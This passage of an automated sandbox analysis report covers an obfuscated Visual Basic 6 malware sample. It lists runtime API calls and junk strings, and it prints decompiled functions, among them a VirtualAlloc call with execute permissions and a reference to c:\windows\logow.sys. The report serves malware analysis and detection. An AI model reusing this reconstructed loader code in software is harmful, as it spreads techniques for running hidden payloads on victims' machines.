__vbaFreeVar.MSVBVM60(?,00000000,00000002,Outpushed1,00000000,0040DB04,00000000,00000001,00000002), ref: 004101FF
__vbaStrCopy.MSVBVM60(0040DB04,00000000,00000001,00000002), ref: 00410234
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D680,00000708), ref: 004102A3
__vbaFreeStr.MSVBVM60(00000000,?,0040D680,00000708), ref: 004102BD
#556.MSVBVM60(00006003), ref: 004102E3
#556.MSVBVM60(00006003,00006003), ref: 00410314
#692.MSVBVM60(00000002,Frdigbyggende,Flavic7,00006003,00006003), ref: 0041033C
__vbaVarTstNe.MSVBVM60(00008008,00000002,00000002,Frdigbyggende,Flavic7,00006003,00006003), ref: 00410360
__vbaFreeVar.MSVBVM60(00008008,00000002,00000002,Frdigbyggende,Flavic7,00006003,00006003), ref: 00410372
__vbaNew2.MSVBVM60(0040DA28,0041331C,00008008,00000002,00000002,Frdigbyggende,Flavic7,00006003,00006003), ref: 004103A7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DA18,0000004C), ref: 0041040C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DE70,00000024), ref: 00410472
__vbaStrMove.MSVBVM60(00000000,?,0040DE70,00000024), ref: 004104A2
__vbaFreeObj.MSVBVM60(00000000,?,0040DE70,00000024), ref: 004104AD
__vbaOnError.MSVBVM60(000000FF,00008008,00000002,00000002,Frdigbyggende,Flavic7,00006003,00006003), ref: 004104BB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D650,000001B8), ref: 00410500
__vbaFreeObj.MSVBVM60(00410862,00006003,00006003), ref: 004107CA
__vbaFreeObj.MSVBVM60(00410862,00006003,00006003), ref: 004107D2
__vbaFreeVar.MSVBVM60(00410862,00006003,00006003), ref: 004107DA
__vbaFreeStr.MSVBVM60(00410862,00006003,00006003), ref: 004107E2
__vbaFreeVar.MSVBVM60(00410862,00006003,00006003), ref: 004107EA
__vbaFreeStr.MSVBVM60(00410862,00006003,00006003), ref: 004107F2
__vbaAryDestruct.MSVBVM60(00000000,0040DCAC,00410862,00006003,00006003), ref: 004107FD
__vbaFreeObj.MSVBVM60(00000000,0040DCAC,00410862,00006003,00006003), ref: 00410805
__vbaFreeObj.MSVBVM60(00000000,0040DCAC,00410862,00006003,00006003), ref: 0041080D
__vbaFreeObj.MSVBVM60(00000000,0040DCAC,00410862,00006003,00006003), ref: 00410815
__vbaFreeStr.MSVBVM60(00000000,0040DCAC,00410862,00006003,00006003), ref: 0041081D
__vbaAryDestruct.MSVBVM60(00000000,?,00000000,0040DCAC,00410862,00006003,00006003), ref: 00410828
__vbaFreeStr.MSVBVM60(00000000,?,00000000,0040DCAC,00410862,00006003,00006003), ref: 00410830
__vbaFreeStr.MSVBVM60(00000000,?,00000000,0040DCAC,00410862,00006003,00006003), ref: 0041083B
__vbaFreeStr.MSVBVM60(00000000,?,00000000,0040DCAC,00410862,00006003,00006003), ref: 00410846
__vbaFreeObj.MSVBVM60(00000000,?,00000000,0040DCAC,00410862,00006003,00006003), ref: 00410851
__vbaFreeObj.MSVBVM60(00000000,?,00000000,0040DCAC,00410862,00006003,00006003), ref: 0041085C

Strings

Circuted, xrefs: 0040FA62
KLARLG, xrefs: 0040EF5E
isogamous, xrefs: 0040FC6B
moderskabernes, xrefs: 0040EF59
Firsaarsfdselsdage, xrefs: 0040EBF1
Outpushed1, xrefs: 004101CA
refractures, xrefs: 00410229
Elicits5, xrefs: 0040FE56
UULjaijLMUuw190, xrefs: 0040EB5D
Underskriftsindsamling, xrefs: 0040F79B
Skamsttter8, xrefs: 0040FBD5
R8RKPuezMDYUe6qnGrDitDuDZFS86, xrefs: 0040F801
dwell, xrefs: 00410666
vehefte, xrefs: 00410433
bothsidedness, xrefs: 0040F4D4
POCOSIN, xrefs: 0040F851
Kummerfuld, xrefs: 0040ED26
Frdigbyggende, xrefs: 00410330
nN, xrefs: 0040FA52
., xrefs: 0040FD83
Flavic7, xrefs: 0041032B
2:2:2, xrefs: 0040F31D
Moaria, xrefs: 0040F44D
, xrefs: 004105EC
Lezannes, xrefs: 0040F508
21:21:21, xrefs: 0040FCAC
b, xrefs: 00410731
tricuspid, xrefs: 00410438
bediapers, xrefs: 0040FE3C
Turns5, xrefs: 0040FE80
String, xrefs: 0040EC30
delbetnkning, xrefs: 0040F889
Rebalance, xrefs: 0040F861
Tinsmithing1, xrefs: 0040FE2C
Totalization, xrefs: 0040F070
Hemathidrosis8, xrefs: 0040F82E
Bernicia9, xrefs: 0040F19D
10/10/10, xrefs: 0040F230

Memory Dump Source

Source File: 00000000.00000002.1172398438.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1172392298.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1172410471.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1172416568.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Chkstk$MoveNew2$Copy$List$Late$#556#716CallDestruct$#516#544#547#554#568#569#571#572#574#588#591#606#607#612#632#675#687#692#697#698AddrefBstrDateErrorFileOpen
String ID: $.$10/10/10$21:21:21$2:2:2$Bernicia9$Circuted$Elicits5$Firsaarsfdselsdage$Flavic7$Frdigbyggende$Hemathidrosis8$KLARLG$Kummerfuld$Lezannes$Moaria$Outpushed1$POCOSIN$R8RKPuezMDYUe6qnGrDitDuDZFS86$Rebalance$Skamsttter8$String$Tinsmithing1$Totalization$Turns5$UULjaijLMUuw190$Underskriftsindsamling$b$bediapers$bothsidedness$delbetnkning$dwell$isogamous$moderskabernes$nN$refractures$tricuspid$vehefte
API String ID: 3371916064-388630999
Opcode ID: 5feed7376fcbc0de9f3b79ede52a58869ed77ac51bdf00ac7e360c86f2f0c1fa
Instruction ID: 39c862cb3f497116c580af56eba6485db6e0bc17140f53a8944bc3d272f02ab6
Opcode Fuzzy Hash: 5feed7376fcbc0de9f3b79ede52a58869ed77ac51bdf00ac7e360c86f2f0c1fa
Instruction Fuzzy Hash: 0FF21670901228AFDB60DF61CC49BDDB7B4AF04304F5085EAE509BB1A1DBB95BC98F58

Uniqueness

Uniqueness Score: -1.00%

Function 00410881, Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 169
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00410881(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				char _v52;
				char* _v60;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed char _v80;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed char _v104;
				intOrPtr* _v108;
				signed int _v112;
				char* _t76;
				signed char _t77;
				signed int _t78;
				char* _t82;
				signed int _t89;
				signed int _t94;
				char* _t98;
				intOrPtr _t120;

				_push(0x401486);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t120;
				_push(0x5c);
				L00401480();
				_v12 = _t120;
				_v8 = 0x4013c0;
				_v60 = L"11/11/11";
				_v68 = 8;
				L0040167E();
				_t76 =  &_v52;
				_push(_t76); // executed
				L00401588(); // executed
				_v72 =  ~(0 | _t76 != 0x0000ffff);
				L00401696();
				_t77 = _v72;
				if(_t77 != 0) {
					_t94 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v32);
					asm("fclex");
					_v72 = _t94;
					if(_v72 >= 0) {
						_v96 = _v96 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x40d650);
						_push(_a4);
						_push(_v72);
						L004016D8();
						_v96 = _t94;
					}
					if( *0x41331c != 0) {
						_v100 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40da28);
						L004016DE();
						_v100 = 0x41331c;
					}
					_v76 =  *_v100;
					_v88 = _v32;
					_v32 = _v32 & 0x00000000;
					_t98 =  &_v36;
					L004016BA();
					_t77 =  *((intOrPtr*)( *_v76 + 0x40))(_v76, _t98, _t98, _v88, L"EYESHIELD");
					asm("fclex");
					_v80 = _t77;
					if(_v80 >= 0) {
						_v104 = _v104 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x40da18);
						_push(_v76);
						_push(_v80);
						L004016D8();
						_v104 = _t77;
					}
					L004016C0();
				}
				_push(0x40dae0);
				L00401582();
				_t78 = _t77 & 0x000000ff;
				if(_t78 != 0x61) {
					L0040157C();
				}
				_push(0x40dad4);
				L0040166C();
				_push(_t78);
				L00401576();
				L0040168A();
				_push(_t78);
				_push(0x40dae0);
				L00401690();
				asm("sbb eax, eax");
				_v72 =  ~( ~( ~_t78));
				L004016C6();
				_t82 = _v72;
				if(_t82 != 0) {
					if( *0x41331c != 0) {
						_v108 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40da28);
						L004016DE();
						_v108 = 0x41331c;
					}
					_v72 =  *_v108;
					_v60 = 0xd8;
					_v68 = 2;
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t89 =  *((intOrPtr*)( *_v72 + 0x34))(_v72, 0x10, 0x3389,  &_v32);
					asm("fclex");
					_v76 = _t89;
					if(_v76 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x34);
						_push(0x40da18);
						_push(_v72);
						_push(_v76);
						L004016D8();
						_v112 = _t89;
					}
					_v92 = _v32;
					_v32 = _v32 & 0x00000000;
					_push(_v92);
					_t82 =  &_v24;
					_push(_t82);
					L004016BA();
				}
				_push(0x410ae3);
				L004016C0();
				return _t82;
			}

0x00410886
0x00410891
0x00410892
0x00410899
0x0041089c
0x004108a4
0x004108a7
0x004108ae
0x004108b5
0x004108c2
0x004108c7
0x004108ca
0x004108cb
0x004108db
0x004108e2
0x004108e7
0x004108ed
0x004108ff
0x00410905
0x00410907
0x0041090e
0x0041092a
0x00410910
0x00410910
0x00410915
0x0041091a
0x0041091d
0x00410920
0x00410925
0x00410925
0x00410935
0x0041094f
0x00410937
0x00410937
0x0041093c
0x00410941
0x00410946
0x00410946
0x0041095b
0x00410961
0x00410964
0x00410970
0x00410974
0x00410982
0x00410985
0x00410987
0x0041098e
0x004109a7
0x00410990
0x00410990
0x00410992
0x00410997
0x0041099a
0x0041099d
0x004109a2
0x004109a2
0x004109ae
0x004109ae
0x004109b3
0x004109b8
0x004109bd
0x004109c5
0x004109c7
0x004109c7
0x004109cc
0x004109d1
0x004109d6
0x004109d7
0x004109e1
0x004109e6
0x004109e7
0x004109ec
0x004109f3
0x004109f9
0x00410a00
0x00410a05
0x00410a0b
0x00410a18
0x00410a32
0x00410a1a
0x00410a1a
0x00410a1f
0x00410a24
0x00410a29
0x00410a29
0x00410a3e
0x00410a41
0x00410a48
0x00410a5b
0x00410a65
0x00410a66
0x00410a67
0x00410a68
0x00410a71
0x00410a74
0x00410a76
0x00410a7d
0x00410a96
0x00410a7f
0x00410a7f
0x00410a81
0x00410a86
0x00410a89
0x00410a8c
0x00410a91
0x00410a91
0x00410a9d
0x00410aa0
0x00410aa4
0x00410aa7
0x00410aaa
0x00410aab
0x00410aab
0x00410ab0
0x00410add
0x00410ae2

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 0041089C
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401486), ref: 004108C2
#557.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401486), ref: 004108CB
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401486), ref: 004108E2
__vbaHresultCheckObj.MSVBVM60(?,?,0040D650,00000160), ref: 00410920
__vbaNew2.MSVBVM60(0040DA28,0041331C), ref: 00410941
__vbaObjSet.MSVBVM60(?,?,EYESHIELD), ref: 00410974
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA18,00000040), ref: 0041099D
__vbaFreeObj.MSVBVM60(00000000,?,0040DA18,00000040), ref: 004109AE
#693.MSVBVM60(0040DAE0,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401486), ref: 004109B8
__vbaEnd.MSVBVM60(0040DAE0,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401486), ref: 004109C7
__vbaI4Str.MSVBVM60(0040DAD4,0040DAE0,?), ref: 004109D1
#537.MSVBVM60(00000000,0040DAD4,0040DAE0,?), ref: 004109D7
__vbaStrMove.MSVBVM60(00000000,0040DAD4,0040DAE0,?), ref: 004109E1
__vbaStrCmp.MSVBVM60(0040DAE0,00000000,00000000,0040DAD4,0040DAE0,?), ref: 004109EC
__vbaFreeStr.MSVBVM60(0040DAE0,00000000,00000000,0040DAD4,0040DAE0,?), ref: 00410A00
__vbaNew2.MSVBVM60(0040DA28,0041331C,0040DAE0,00000000,00000000,0040DAD4,0040DAE0,?), ref: 00410A24
__vbaChkstk.MSVBVM60(00003389,?,?,?,?,?,0040DAE0,00000000,00000000,0040DAD4,0040DAE0,?), ref: 00410A5B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA18,00000034,?,?,?,?,0040DAE0,00000000,00000000,0040DAD4,0040DAE0,?), ref: 00410A8C
__vbaObjSet.MSVBVM60(?,?,?,?,?,?,0040DAE0,00000000,00000000,0040DAD4,0040DAE0,?), ref: 00410AAB
__vbaFreeObj.MSVBVM60(00410AE3,0040DAE0,00000000,00000000,0040DAD4,0040DAE0,?), ref: 00410ADD

Strings

11/11/11, xrefs: 004108AE
EYESHIELD, xrefs: 00410968

Memory Dump Source

Source File: 00000000.00000002.1172398438.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1172392298.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1172410471.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1172416568.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$ChkstkNew2$#537#557#693Move
String ID: 11/11/11$EYESHIELD
API String ID: 3078397079-3163467159
Opcode ID: ea3dc0c666cf96eab1d12de92fb94771985e69ce9e87b5ba1d99c94fc6013222
Instruction ID: caedb437a50a51d39b01e2a1e67be77e1cf23cc65eb6b48ed887e873de3f6812
Opcode Fuzzy Hash: ea3dc0c666cf96eab1d12de92fb94771985e69ce9e87b5ba1d99c94fc6013222
Instruction Fuzzy Hash: EC610670E10209AFDF10EFE5C846BEEBBB4AF14705F10442AF405BB2A1D7B95986CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E774, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 224
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040E774(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v32;
				char _v36;
				char _v40;
				signed int _v44;
				char _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				signed int _v68;
				char* _v72;
				signed int _v76;
				signed int _v80;
				void* _v84;
				signed int _v88;
				signed int _v92;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _t124;
				signed int _t129;
				char* _t130;
				char* _t131;
				signed int _t135;
				signed int _t141;
				signed int _t147;
				char* _t149;
				signed int _t152;
				void* _t161;
				void* _t163;
				intOrPtr _t164;

				_t164 = _t163 - 0xc;
				 *[fs:0x0] = _t164;
				L00401480();
				_v16 = _t164;
				_v12 = 0x4011b0;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x70,  *[fs:0x0], 0x401486, _t161);
				if( *0x41331c != 0) {
					_v108 = 0x41331c;
				} else {
					_push(0x41331c);
					_push(0x40da28);
					L004016DE();
					_v108 = 0x41331c;
				}
				_v76 =  *_v108;
				_t124 =  *((intOrPtr*)( *_v76 + 0x14))(_v76,  &_v40);
				asm("fclex");
				_v80 = _t124;
				if(_v80 >= 0) {
					_v112 = _v112 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40da18);
					_push(_v76);
					_push(_v80);
					L004016D8();
					_v112 = _t124;
				}
				_v84 = _v40;
				_t129 =  *((intOrPtr*)( *_v84 + 0x100))(_v84,  &_v68);
				asm("fclex");
				_v88 = _t129;
				if(_v88 >= 0) {
					_v116 = _v116 & 0x00000000;
				} else {
					_push(0x100);
					_push(0x40da38);
					_push(_v84);
					_push(_v88);
					L004016D8();
					_v116 = _t129;
				}
				_push(0x10);
				_push(0xc8);
				_push(0x140);
				_push(0);
				_push(L"c:\\windows\\logow.sys");
				_t130 =  &_v36;
				_push(_t130);
				L004016D2();
				_push(_t130);
				_push(_v68);
				E0040D7FC(); // executed
				_v72 = _t130;
				L004016CC();
				_t131 = _v72;
				_v32 = _t131;
				L004016C6();
				L004016C0();
				if(_v32 != 0) {
					_t135 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v68);
					asm("fclex");
					_v76 = _t135;
					if(_v76 >= 0) {
						_v120 = _v120 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x40d650);
						_push(_a4);
						_push(_v76);
						L004016D8();
						_v120 = _t135;
					}
					_push(_v68);
					E0040D88C();
					L004016CC();
					E0040D8F8();
					L004016CC();
					_push(_v32);
					_push(2);
					E0040D944();
					L004016CC();
					_push(2);
					E0040D998();
					_v68 = _t135;
					L004016CC();
					E0040D844();
					L004016CC();
					if( *0x41331c != 0) {
						_v124 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40da28);
						L004016DE();
						_v124 = 0x41331c;
					}
					_v76 =  *_v124;
					_t141 =  *((intOrPtr*)( *_v76 + 0x1c))(_v76,  &_v40);
					asm("fclex");
					_v80 = _t141;
					if(_v80 >= 0) {
						_v128 = _v128 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40da18);
						_push(_v76);
						_push(_v80);
						L004016D8();
						_v128 = _t141;
					}
					_v84 = _v40;
					_v56 = 2;
					_v64 = 3;
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t147 =  *((intOrPtr*)( *_v84 + 0x54))(_v84, 0x10,  &_v44);
					asm("fclex");
					_v88 = _t147;
					if(_v88 >= 0) {
						_v132 = _v132 & 0x00000000;
					} else {
						_push(0x54);
						_push(0x40da78);
						_push(_v84);
						_push(_v88);
						L004016D8();
						_v132 = _t147;
					}
					_v104 = _v44;
					_v44 = _v44 & 0x00000000;
					_t149 =  &_v48;
					L004016BA();
					_t152 =  *((intOrPtr*)( *_a4 + 0x154))(_a4, _t149, _t149, _v104);
					asm("fclex");
					_v92 = _t152;
					if(_v92 >= 0) {
						_v136 = _v136 & 0x00000000;
					} else {
						_push(0x154);
						_push(0x40d650);
						_push(_a4);
						_push(_v92);
						L004016D8();
						_v136 = _t152;
					}
					_push( &_v48);
					_t131 =  &_v40;
					_push(_t131);
					_push(2);
					L004016B4();
				}
				_v8 = 0;
				_push(0x40ea7a);
				return _t131;
			}

0x0040e777
0x0040e786
0x0040e790
0x0040e798
0x0040e79b
0x0040e7a8
0x0040e7b1
0x0040e7bc
0x0040e7c6
0x0040e7e0
0x0040e7c8
0x0040e7c8
0x0040e7cd
0x0040e7d2
0x0040e7d7
0x0040e7d7
0x0040e7ec
0x0040e7fb
0x0040e7fe
0x0040e800
0x0040e807
0x0040e820
0x0040e809
0x0040e809
0x0040e80b
0x0040e810
0x0040e813
0x0040e816
0x0040e81b
0x0040e81b
0x0040e827
0x0040e836
0x0040e83c
0x0040e83e
0x0040e845
0x0040e861
0x0040e847
0x0040e847
0x0040e84c
0x0040e851
0x0040e854
0x0040e857
0x0040e85c
0x0040e85c
0x0040e865
0x0040e867
0x0040e86c
0x0040e871
0x0040e873
0x0040e878
0x0040e87b
0x0040e87c
0x0040e881
0x0040e882
0x0040e885
0x0040e88a
0x0040e88d
0x0040e892
0x0040e895
0x0040e89b
0x0040e8a3
0x0040e8ac
0x0040e8bf
0x0040e8c2
0x0040e8c4
0x0040e8cb
0x0040e8e4
0x0040e8cd
0x0040e8cd
0x0040e8cf
0x0040e8d4
0x0040e8d7
0x0040e8da
0x0040e8df
0x0040e8df
0x0040e8e8
0x0040e8eb
0x0040e8f0
0x0040e8f5
0x0040e8fa
0x0040e8ff
0x0040e902
0x0040e904
0x0040e909
0x0040e90e
0x0040e910
0x0040e915
0x0040e918
0x0040e91d
0x0040e922
0x0040e92e
0x0040e948
0x0040e930
0x0040e930
0x0040e935
0x0040e93a
0x0040e93f
0x0040e93f
0x0040e954
0x0040e963
0x0040e966
0x0040e968
0x0040e96f
0x0040e988
0x0040e971
0x0040e971
0x0040e973
0x0040e978
0x0040e97b
0x0040e97e
0x0040e983
0x0040e983
0x0040e98f
0x0040e992
0x0040e999
0x0040e9a7
0x0040e9b1
0x0040e9b2
0x0040e9b3
0x0040e9b4
0x0040e9bd
0x0040e9c0
0x0040e9c2
0x0040e9c9
0x0040e9e2
0x0040e9cb
0x0040e9cb
0x0040e9cd
0x0040e9d2
0x0040e9d5
0x0040e9d8
0x0040e9dd
0x0040e9dd
0x0040e9e9
0x0040e9ec
0x0040e9f3
0x0040e9f7
0x0040ea05
0x0040ea0b
0x0040ea0d
0x0040ea14
0x0040ea33
0x0040ea16
0x0040ea16
0x0040ea1b
0x0040ea20
0x0040ea23
0x0040ea26
0x0040ea2b
0x0040ea2b
0x0040ea3d
0x0040ea3e
0x0040ea41
0x0040ea42
0x0040ea44
0x0040ea49
0x0040ea4c
0x0040ea53
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 0040E790
__vbaNew2.MSVBVM60(0040DA28,0041331C,?,?,?,?,00401486), ref: 0040E7D2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA18,00000014), ref: 0040E816
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA38,00000100), ref: 0040E857
__vbaStrToAnsi.MSVBVM60(?,c:\windows\logow.sys,00000000,00000140,000000C8,00000010), ref: 0040E87C
__vbaSetSystemError.MSVBVM60(?,00000000,?,c:\windows\logow.sys,00000000,00000140,000000C8,00000010), ref: 0040E88D
__vbaFreeStr.MSVBVM60(?,00000000,?,c:\windows\logow.sys,00000000,00000140,000000C8,00000010), ref: 0040E89B
__vbaFreeObj.MSVBVM60(?,00000000,?,c:\windows\logow.sys,00000000,00000140,000000C8,00000010), ref: 0040E8A3
__vbaHresultCheckObj.MSVBVM60(00000000,004011B0,0040D650,00000058), ref: 0040E8DA
__vbaSetSystemError.MSVBVM60(?), ref: 0040E8F0
__vbaSetSystemError.MSVBVM60(?), ref: 0040E8FA
__vbaSetSystemError.MSVBVM60(00000002,00000000,?), ref: 0040E909
__vbaSetSystemError.MSVBVM60(00000002,00000002,00000000,?), ref: 0040E918
__vbaSetSystemError.MSVBVM60(00000002,00000002,00000000,?), ref: 0040E922
__vbaNew2.MSVBVM60(0040DA28,0041331C,00000002,00000002,00000000,?), ref: 0040E93A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DA18,0000001C), ref: 0040E97E
__vbaChkstk.MSVBVM60(?), ref: 0040E9A7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA78,00000054), ref: 0040E9D8
__vbaObjSet.MSVBVM60(?,?), ref: 0040E9F7
__vbaHresultCheckObj.MSVBVM60(00000000,004011B0,0040D650,00000154), ref: 0040EA26
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040EA44

Strings

c:\windows\logow.sys, xrefs: 0040E873

Memory Dump Source

Source File: 00000000.00000002.1172398438.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1172392298.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1172410471.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1172416568.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckErrorHresultSystem$Free$ChkstkNew2$AnsiList
String ID: c:\windows\logow.sys
API String ID: 1859893698-110338818
Opcode ID: b2191a3423b6eaa2219ffd8c37ba73ac44c17b91899e223d7c96812739a08b2d
Instruction ID: 8ac5ff859fd0c23a2ed53498ff5b30c8016f140ea5ea9da80c0e09f40d46c387
Opcode Fuzzy Hash: b2191a3423b6eaa2219ffd8c37ba73ac44c17b91899e223d7c96812739a08b2d
Instruction Fuzzy Hash: B991D371D00208AFDB10EFE6C845B9DBBB4BF08305F24442AF505BB2A1C77999959F59

Uniqueness

Uniqueness Score: -1.00%

Function 004016FC, Relevance: 4.5, APIs: 1, Strings: 1, Instructions: 962COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401701

Strings

VB5!6&*, xrefs: 004016FC

Memory Dump Source

Source File: 00000000.00000002.1172398438.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1172392298.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1172410471.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1172416568.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: e3bc00da31d6ca57e9b0453bbd5719d4c4133ff08dfee241c4ec6c5fb0f9ecf1
Instruction ID: 36f78e55ab179af5219788f8fa41d8eb454c1033019d7bf68c9d5ccb81e84529
Opcode Fuzzy Hash: e3bc00da31d6ca57e9b0453bbd5719d4c4133ff08dfee241c4ec6c5fb0f9ecf1
Instruction Fuzzy Hash: 1A92877145E3D08FDB239B7888B0A553FF0EE2760570A4ADBC4809F0A7D629681DE767

Uniqueness

Uniqueness Score: -1.00%

Function 0040A75D, Relevance: 1.8, APIs: 1, Instructions: 502memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040,?), ref: 0040A854

Memory Dump Source

Source File: 00000000.00000002.1172398438.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1172392298.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1172410471.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1172416568.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 157205239880d3e14332ec1d3cf6d3a82e3d71d54d6332d2078461d81ddeda9e
Instruction ID: 84eb0c32109bbbe55177793c21888fc2170a4c1f3db04d95b287c1728db86467
Opcode Fuzzy Hash: 157205239880d3e14332ec1d3cf6d3a82e3d71d54d6332d2078461d81ddeda9e
Instruction Fuzzy Hash: 86B1135291A34189FF762160C4D571DA650DB56380F34CF37CEA0F29E1AA2FC6DB268B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004F090B, Relevance: 5.8, Strings: 4, Instructions: 845COMMON

Download Yara Rule

Strings

U4`a, xrefs: 004F0A4E
WQ(, xrefs: 004F2A05
U/, xrefs: 004F2CDE
`E, xrefs: 004F2B25

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID: U4`a$WQ($U/$`E
API String ID: 0-2459023928
Opcode ID: 0de81bf6ea70a2fa5cc30e1d94af55d4966c4cc4066fc3b37b2afecd9f8b3a9b
Instruction ID: c123a7a1594365c921fa73a1dc591ad8cd70b5247942fee79e802ab83ea24df2
Opcode Fuzzy Hash: 0de81bf6ea70a2fa5cc30e1d94af55d4966c4cc4066fc3b37b2afecd9f8b3a9b
Instruction Fuzzy Hash: F7428E7064430EEEEF301A108E95BFA3262AF51794F75012BFF86571D2D7BD8886960B

Uniqueness

Uniqueness Score: -1.00%

Function 004F6632, Relevance: 4.4, Strings: 3, Instructions: 609COMMON

Download Yara Rule

Strings

WQ(, xrefs: 004F2A05
U/, xrefs: 004F2CDE
`E, xrefs: 004F2B25

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID: WQ($U/$`E
API String ID: 0-2211583500
Opcode ID: 1024e6329d427676b098519259af525fc26d3960ff2e3a2e1cfa7ce39816ff45
Instruction ID: acbc87aa56a73b5416037e7e5e840f69389188d887408062c9722e06f2f34a28
Opcode Fuzzy Hash: 1024e6329d427676b098519259af525fc26d3960ff2e3a2e1cfa7ce39816ff45
Instruction Fuzzy Hash: 8B127E7060030A9FEF209E24CD95BF676A1EF11354F65812BEF855B2D5C3BD8886C71A

Uniqueness

Uniqueness Score: -1.00%

Function 004F0A31, Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

U4`a, xrefs: 004F0A4E

Memory Dump Source

Source File: 00000000.00000002.1172500569.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID: U4`a
API String ID: 0-2713540521
Opcode ID: 54744495183d99c4bda2a2299300b4943d2fca733f45c0cf0699cf4f54868610
Instruction ID: 822c566539f1ef6e09e4e399254a0e1b920fd2510c932d29a14e6b893f9d3f15
Opcode Fuzzy Hash: 54744495183d99c4bda2a2299300b4943d2fca733f45c0cf0699cf4f54868610
Instruction Fuzzy Hash: FBD1FE3564430EEEEF35156449A27FA33229FC27A0F69021BDF82131A3DB1D9486C65B

Uniqueness

Uniqueness Score: -1.00%

Function 004F092C, Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

U4`a, xrefs: 004F0A4E

Memory Dump Source

